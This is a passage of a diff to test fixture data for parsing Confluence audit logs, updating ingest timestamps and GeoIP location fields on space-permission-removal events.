"81.2.69.143", 
@@ -6603,7 +6213,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222494699Z", + "ingested": "2021-12-14T14:34:31.513228709Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.366Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6676,20 +6286,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6697,7 +6301,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222496582Z", + "ingested": "2021-12-14T14:34:31.513229122Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.361Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6770,20 +6374,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6791,7 +6389,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222498490Z", + "ingested": "2021-12-14T14:34:31.513229514Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.357Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6864,20 +6462,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6885,7 +6477,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222500376Z", + "ingested": "2021-12-14T14:34:31.513229923Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.350Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6958,20 +6550,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6979,7 +6565,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222502251Z", + "ingested": "2021-12-14T14:34:31.513230326Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.342Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7045,20 +6631,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7066,7 +6646,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222504134Z", + "ingested": "2021-12-14T14:34:31.513230710Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.330Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7139,20 +6719,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7160,7 +6734,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222506019Z", + "ingested": "2021-12-14T14:34:31.513231099Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.324Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7233,20 +6807,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7254,7 +6822,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222507911Z", + "ingested": "2021-12-14T14:34:31.513231514Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.311Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7327,20 +6895,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7348,7 +6910,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222509793Z", + "ingested": "2021-12-14T14:34:31.513231953Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.303Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7421,20 +6983,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7442,7 +6998,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222511653Z", + "ingested": "2021-12-14T14:34:31.513232356Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.295Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7515,20 +7071,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7536,7 +7086,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222513672Z", + "ingested": "2021-12-14T14:34:31.513232943Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.290Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7602,20 +7152,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7623,7 +7167,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222515560Z", + "ingested": "2021-12-14T14:34:31.513233387Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.285Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7696,20 +7240,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7717,7 +7255,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222517444Z", + "ingested": "2021-12-14T14:34:31.513234211Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.282Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7790,20 +7328,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7811,7 +7343,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222519323Z", + "ingested": "2021-12-14T14:34:31.513234699Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.278Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7884,20 +7416,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7905,7 +7431,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222521203Z", + "ingested": "2021-12-14T14:34:31.513235091Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.274Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7971,20 +7497,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -7992,7 +7512,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222523108Z", + "ingested": "2021-12-14T14:34:31.513235492Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.270Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8065,20 +7585,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
